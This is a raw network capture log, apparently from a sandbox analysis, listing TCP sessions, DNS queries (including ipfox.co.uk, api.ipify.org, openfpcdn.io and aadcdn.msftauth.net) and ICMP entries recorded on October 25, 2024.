                                              Oct 25, 2024 15:46:25.026123047 CEST4434994313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.026336908 CEST49943443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.026494026 CEST49943443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.026513100 CEST4434994313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.101757050 CEST4434994013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.102816105 CEST49940443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.102878094 CEST4434994013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.103280067 CEST49940443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.103296041 CEST4434994013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.134776115 CEST4434994113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.135425091 CEST49941443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.135442972 CEST4434994113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.136326075 CEST49941443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.136332989 CEST4434994113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.142561913 CEST4434993913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.142715931 CEST4434993913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.142885923 CEST49939443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.143173933 CEST49939443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.143191099 CEST4434993913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.143233061 CEST49939443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.143240929 CEST4434993913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.147039890 CEST49944443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.147069931 CEST4434994413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.147840023 CEST49944443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.148490906 CEST49944443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.148505926 CEST4434994413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.243094921 CEST4434994013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.243438959 CEST4434994013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.243493080 CEST4434994013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.243527889 CEST49940443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.243611097 CEST49940443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.243611097 CEST49940443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.243664980 CEST49940443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.243709087 CEST4434994013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.246789932 CEST49945443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.246819019 CEST4434994513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.247001886 CEST49945443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.247318029 CEST49945443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.247328043 CEST4434994513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.266540051 CEST4434994113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.266688108 CEST4434994113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.266844988 CEST49941443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.266844988 CEST49941443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.266885996 CEST49941443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.266901970 CEST4434994113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.269745111 CEST49946443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.269807100 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.269980907 CEST49946443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.270087957 CEST49946443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.270104885 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.586230993 CEST4434994213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.587007046 CEST49942443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.587060928 CEST4434994213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.587609053 CEST49942443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.587621927 CEST4434994213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.718910933 CEST4434994213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.719053030 CEST4434994213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.719162941 CEST49942443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.719417095 CEST49942443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.719454050 CEST4434994213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.719485998 CEST49942443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.719502926 CEST4434994213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.722620010 CEST49947443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.722666979 CEST4434994713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.722901106 CEST49947443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.723166943 CEST49947443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.723186016 CEST4434994713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.752734900 CEST4434994313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.753335953 CEST49943443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.753356934 CEST4434994313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.753905058 CEST49943443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.753911972 CEST4434994313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.880812883 CEST4434994313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.880981922 CEST4434994313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.881066084 CEST49943443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.881227016 CEST49943443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.881242037 CEST4434994313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.881293058 CEST49943443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.881300926 CEST4434994313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.891807079 CEST4434994413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.892453909 CEST49944443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.892488003 CEST4434994413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.892973900 CEST49944443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.892986059 CEST4434994413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.894655943 CEST49948443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.894709110 CEST4434994813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.894774914 CEST49948443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.894916058 CEST49948443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.894933939 CEST4434994813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.982884884 CEST4434994513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.984847069 CEST49945443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.984857082 CEST4434994513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:25.985534906 CEST49945443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:25.985541105 CEST4434994513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.003421068 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.003911972 CEST49946443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.003943920 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.004611015 CEST49946443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.004635096 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.025893927 CEST4434994413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.026092052 CEST4434994413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.026202917 CEST49944443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.026292086 CEST49944443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.026319981 CEST4434994413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.026338100 CEST49944443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.026346922 CEST4434994413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.030222893 CEST49949443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.030256033 CEST4434994913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.030354023 CEST49949443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.030694008 CEST49949443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.030709982 CEST4434994913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.132915020 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.132997990 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.133071899 CEST49946443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.133095980 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.133121014 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.133192062 CEST49946443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.133378029 CEST49946443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.133402109 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.133413076 CEST49946443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.133419991 CEST4434994613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.136828899 CEST49950443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.136882067 CEST4434995013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.136960983 CEST49950443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.137099981 CEST49950443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.137118101 CEST4434995013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.160733938 CEST4434994513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.160825014 CEST4434994513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.160878897 CEST49945443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.161053896 CEST49945443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.161070108 CEST4434994513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.161079884 CEST49945443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.161084890 CEST4434994513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.164460897 CEST49951443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.164485931 CEST4434995113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.164586067 CEST49951443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.164782047 CEST49951443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.164793968 CEST4434995113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.459132910 CEST4434994713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.459805012 CEST49947443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.459824085 CEST4434994713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.460408926 CEST49947443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.460416079 CEST4434994713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.590419054 CEST4434994713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.590593100 CEST4434994713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.590848923 CEST49947443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.590848923 CEST49947443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.591221094 CEST49947443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.591239929 CEST4434994713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.594546080 CEST49952443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.594621897 CEST4434995213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.594926119 CEST49952443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.595006943 CEST49952443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.595017910 CEST4434995213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.641499043 CEST4434994813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.642153978 CEST49948443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.642196894 CEST4434994813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.642693043 CEST49948443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.642699957 CEST4434994813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.774854898 CEST4434994813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.774943113 CEST4434994813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.775019884 CEST4434994813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.775207996 CEST49948443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.775286913 CEST49948443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.775286913 CEST49948443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.775306940 CEST4434994813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.775321960 CEST4434994813.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.779037952 CEST49953443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.779078960 CEST4434995313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.779201031 CEST49953443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.779364109 CEST49953443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.779376984 CEST4434995313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.781085968 CEST4434994913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.781510115 CEST49949443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.781526089 CEST4434994913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.782082081 CEST49949443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.782095909 CEST4434994913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.869452953 CEST4434995013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.870630026 CEST49950443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.870630026 CEST49950443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.870656967 CEST4434995013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.870677948 CEST4434995013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.895766973 CEST4434995113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.896790981 CEST49951443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.896790981 CEST49951443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.896804094 CEST4434995113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.896821976 CEST4434995113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.914391994 CEST4434994913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.914592981 CEST4434994913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.914884090 CEST49949443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.914884090 CEST49949443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.914884090 CEST49949443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.918016911 CEST49954443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.918066978 CEST4434995413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:26.918246984 CEST49954443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.918381929 CEST49954443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:26.918391943 CEST4434995413.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.000735044 CEST4434995013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.000804901 CEST4434995013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.000912905 CEST4434995013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.001074076 CEST49950443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.001148939 CEST49950443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.001148939 CEST49950443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.001176119 CEST4434995013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.001185894 CEST4434995013.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.004640102 CEST49955443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.004687071 CEST4434995513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.004880905 CEST49955443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.004988909 CEST49955443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.005000114 CEST4434995513.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.025634050 CEST4434995113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.025798082 CEST4434995113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.026041985 CEST49951443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.026076078 CEST49951443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.026076078 CEST49951443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.026102066 CEST4434995113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.026114941 CEST4434995113.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.029954910 CEST49956443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.030036926 CEST4434995613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.030159950 CEST49956443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.030286074 CEST49956443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.030297041 CEST4434995613.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.126771927 CEST49949443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.126797915 CEST4434994913.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.332449913 CEST4434995213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.333112955 CEST49952443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.333152056 CEST4434995213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.333776951 CEST49952443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.333785057 CEST4434995213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.799549103 CEST4434995213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.799662113 CEST4434995213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.799768925 CEST4434995213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.799845934 CEST49952443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.799979925 CEST49952443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.800004005 CEST4434995213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.800020933 CEST49952443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.800029039 CEST4434995213.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.801572084 CEST4434995313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.802429914 CEST49953443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.802449942 CEST4434995313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.802966118 CEST49953443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.802970886 CEST4434995313.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.804564953 CEST49957443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.804615974 CEST4434995713.107.246.45192.168.2.4
                                              Oct 25, 2024 15:46:27.804686069 CEST49957443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.804807901 CEST49957443192.168.2.413.107.246.45
                                              Oct 25, 2024 15:46:27.804821014 CEST4434995713.107.246.45192.168.2.4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 25, 2024 15:45:04.536272049 CEST53514731.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:04.611576080 CEST53527551.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:05.951762915 CEST53603831.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:06.708772898 CEST5925853192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:06.708904982 CEST5114253192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:06.851583004 CEST53592581.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:07.272864103 CEST53511421.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:07.793168068 CEST6236553192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:07.793317080 CEST6536653192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:07.800942898 CEST53623651.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:07.800982952 CEST53653661.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:07.806829929 CEST5947953192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:07.806991100 CEST5022853192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:07.815203905 CEST53502281.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:07.815481901 CEST53594791.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:08.428204060 CEST5089353192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:08.428522110 CEST6490953192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:08.435563087 CEST53508931.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:08.436253071 CEST53649091.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:09.412919044 CEST5451753192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:09.413654089 CEST6408653192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:09.420933008 CEST53545171.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:09.421271086 CEST53640861.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:09.557385921 CEST6481453192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:09.557791948 CEST5435853192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:09.565506935 CEST53543581.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:09.566464901 CEST53648141.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:09.569022894 CEST6467953192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:09.569327116 CEST5403553192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:09.576761961 CEST53646791.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:09.576903105 CEST53540351.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:09.593822002 CEST53603211.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.127410889 CEST6217553192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.128144979 CEST5780453192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.163126945 CEST53621751.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.212291956 CEST5894253192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.220444918 CEST53589421.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.234049082 CEST5281553192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.241323948 CEST53528151.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.296782017 CEST6096353192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.297368050 CEST6376653192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.300751925 CEST5095753192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.301064014 CEST5894153192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.304030895 CEST5886453192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.304526091 CEST4964953192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.305727959 CEST53637661.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.307324886 CEST5479553192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.307816029 CEST5039853192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.307967901 CEST53509571.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.308235884 CEST53589411.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.308376074 CEST53609631.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.311661005 CEST53588641.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.312259912 CEST53496491.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.315704107 CEST53547951.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.327400923 CEST53503981.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.566586971 CEST5452953192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.567071915 CEST5197153192.168.2.41.1.1.1
                                              Oct 25, 2024 15:45:11.574269056 CEST53545291.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.574594021 CEST53519711.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:11.977956057 CEST53578041.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:14.583545923 CEST138138192.168.2.4192.168.2.255
                                              Oct 25, 2024 15:45:23.026390076 CEST53644351.1.1.1192.168.2.4
                                              Oct 25, 2024 15:45:42.010308027 CEST53562731.1.1.1192.168.2.4
                                              Oct 25, 2024 15:46:04.121658087 CEST53596101.1.1.1192.168.2.4
                                              Oct 25, 2024 15:46:04.448676109 CEST53621911.1.1.1192.168.2.4
                                              TimestampSource IPDest IPChecksumCodeType
                                              Oct 25, 2024 15:45:07.272953033 CEST192.168.2.41.1.1.1c22a(Port unreachable)Destination Unreachable
                                              Oct 25, 2024 15:45:11.978049994 CEST192.168.2.41.1.1.1c22a(Port unreachable)Destination Unreachable
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Oct 25, 2024 15:45:06.708772898 CEST192.168.2.41.1.1.10x6bcaStandard query (0)ipfox.co.ukA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:06.708904982 CEST192.168.2.41.1.1.10x13a6Standard query (0)ipfox.co.uk65IN (0x0001)false
                                              Oct 25, 2024 15:45:07.793168068 CEST192.168.2.41.1.1.10x99f7Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:07.793317080 CEST192.168.2.41.1.1.10xd51dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                              Oct 25, 2024 15:45:07.806829929 CEST192.168.2.41.1.1.10xfbeeStandard query (0)openfpcdn.ioA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:07.806991100 CEST192.168.2.41.1.1.10x226eStandard query (0)openfpcdn.io65IN (0x0001)false
                                              Oct 25, 2024 15:45:08.428204060 CEST192.168.2.41.1.1.10x921dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:08.428522110 CEST192.168.2.41.1.1.10x6d05Standard query (0)www.google.com65IN (0x0001)false
                                              Oct 25, 2024 15:45:09.412919044 CEST192.168.2.41.1.1.10x9250Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.413654089 CEST192.168.2.41.1.1.10xcd89Standard query (0)api.ipify.org65IN (0x0001)false
                                              Oct 25, 2024 15:45:09.557385921 CEST192.168.2.41.1.1.10x102fStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.557791948 CEST192.168.2.41.1.1.10x3f6fStandard query (0)logo.clearbit.com65IN (0x0001)false
                                              Oct 25, 2024 15:45:09.569022894 CEST192.168.2.41.1.1.10x5139Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.569327116 CEST192.168.2.41.1.1.10x50f6Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                              Oct 25, 2024 15:45:11.127410889 CEST192.168.2.41.1.1.10xa2c8Standard query (0)ipfox.co.ukA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.128144979 CEST192.168.2.41.1.1.10xa9c3Standard query (0)ipfox.co.uk65IN (0x0001)false
                                              Oct 25, 2024 15:45:11.212291956 CEST192.168.2.41.1.1.10xc486Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
